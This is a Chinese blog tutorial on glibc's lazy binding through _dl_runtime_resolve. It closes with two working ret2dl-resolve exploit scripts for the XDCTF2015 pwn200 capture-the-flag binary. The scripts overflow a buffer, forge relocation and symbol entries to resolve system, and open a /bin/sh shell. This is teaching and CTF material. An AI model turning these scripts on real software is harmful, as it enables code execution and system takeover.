_dl_runtime_resolve

2019-08-27  本文已影响0人  常向阳_

简介

在Linux中如果程序想要调用其它动态链接库的函数,必须要在程序加载的时候动态链接;在一个程序运行过程中,可能很多函数在程序执行完时都不会用到,比如一些错误处理函数或者一些用户很少用到的功能模块,所以ELF采用一种叫做延迟绑定(Lazy Binding)的做法,基本思想就是当函数第一次被调用的时候才进行绑定(符号查找、重定位等);而在Linux中是利用_dl_runtime_resolve(link_map_obj, reloc_index)函数来对动态链接的函数进行重定位的

_dl_runtime_resolve函数具体运行模式

  1. 首先用link_map访问.dynamic,分别取出.dynstr.dynsym.rel.plt的地址
  2. .rel.plt+参数relic_index,求出当前函数的重定位表项Elf32_Rel的指针,记作rel
  3. rel->r_info >> 8 作为.dynsym的下标,求出当前函数的符号表项Elf32_Sym的指针,记作sym
  4. .dynstr + sym->st_name得出符号名 字符串指针
  5. 在动态链接库查找这个函数的地址,并且把地址赋值给*rel->r_offset,即GOT
  6. 最后调用这个函数

puts为例追踪一下ELF文件libc函数解析过程

0x00 call puts@plt

image.png

0x01 si进入call puts@plt

image.png

0x02 因为会jmp dword ptr [0x804a00c],所以查看一下0x804a00c的内容,存放的是0x080482e6地址,其中0x080482e6puts@plt第二条指令的地址,即read@got中初始存放read@plt第二条指令地址

image.png
image.png
image.png

0x03 jmp 0x80482d0

image.png
push   0
push   dword ptr [0x804a004]

0x04 那么我们看看通过这两个参数是如何找到puts函数的呢

r_offset = 0x804a00c
r_info = 107h

利用思路

0x00 计算reloc_index

image.png

0x01 计算r_info

image.png

r_info的计算方法有两个步骤

0x02 计算st_name

image.png

例子(这里有XDCTF2015pwn200

# coding=utf-8
from roputils import *
from pwn import process
from pwn import gdb
from pwn import context
processName = 'main'
offset = 112

r = process('./' + processName)
context.log_level = 'debug'
rop = ROP('./' + processName)

bss_base = rop.section('.bss')
buf = rop.fill(offset)

buf += rop.call('read', 0, bss_base, 100)
## used to call dl_Resolve()
buf += rop.dl_resolve_call(bss_base + 20, bss_base)
r.send(buf)

buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
## used to make faking data, such relocation, Symbol, Str
buf += rop.dl_resolve_data(bss_base + 20, 'system')
buf += rop.fill(100, buf)
r.send(buf)
r.interactive()
image.png 构造的ROP
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './main'
p = process(name)
elf= ELF(name)
rel_plt_addr = elf.get_section_by_name('.rel.plt').header.sh_addr   #0x8048330
dynsym_addr =  elf.get_section_by_name('.dynsym').header.sh_addr    #0x80481d8
dynstr_addr = elf.get_section_by_name('.dynstr').header.sh_addr     #0x8048278
resolve_plt = 0x08048380
leave_ret_addr = 0x0804851D
start = 0x804aa00
fake_rel_plt_addr = start
fake_dynsym_addr = fake_rel_plt_addr + 0x8
fake_dynstr_addr = fake_dynsym_addr + 0x10
bin_sh_addr = fake_dynstr_addr + 0x8
#n index_arg
n = fake_rel_plt_addr - rel_plt_addr
r_info = (((fake_dynsym_addr - dynsym_addr)/0x10) << 8) + 0x7
str_offset = fake_dynstr_addr - dynstr_addr
fake_rel_plt = p32(elf.got['read']) + p32(r_info)
fake_dynsym = p32(str_offset) + p32(0) + p32(0) + p32(0x12000000)
fake_dynstr = "system"+'\x00'+'\x00'
fake_dynstr += "/bin/sh"+'\x00'
pay1 = 'a'*108 + p32(start - 20) + p32(elf.plt['read']) + p32(leave_ret_addr) + p32(0) + p32(start - 20) + p32(0x100)
p.recvuntil('Welcome to XDCTF2015~!\n')
p.sendline(pay1)
pay2 = p32(0x0) + p32(resolve_plt) + p32(n) + 'aaaa' + p32(bin_sh_addr) + fake_rel_plt + fake_dynsym + fake_dynstr
p.sendline(pay2)
success(".rel_plt: " + hex(rel_plt_addr))
success(".dynsym: " + hex(dynsym_addr))
success(".dynstr: " + hex(dynstr_addr))
success("fake_rel_plt_addr: " + hex(fake_rel_plt_addr))
success("fake_dynsym_addr: " + hex(fake_dynsym_addr))
success("fake_dynstr_addr: " + hex(fake_dynstr_addr))
success("n: " + hex(n))
success("r_info: " + hex(r_info))
success("offset: " + hex(str_offset))
success("system_addr: " + hex(fake_dynstr_addr))
success("bss_addr: " + hex(elf.bss()))
p.interactive()
image.png
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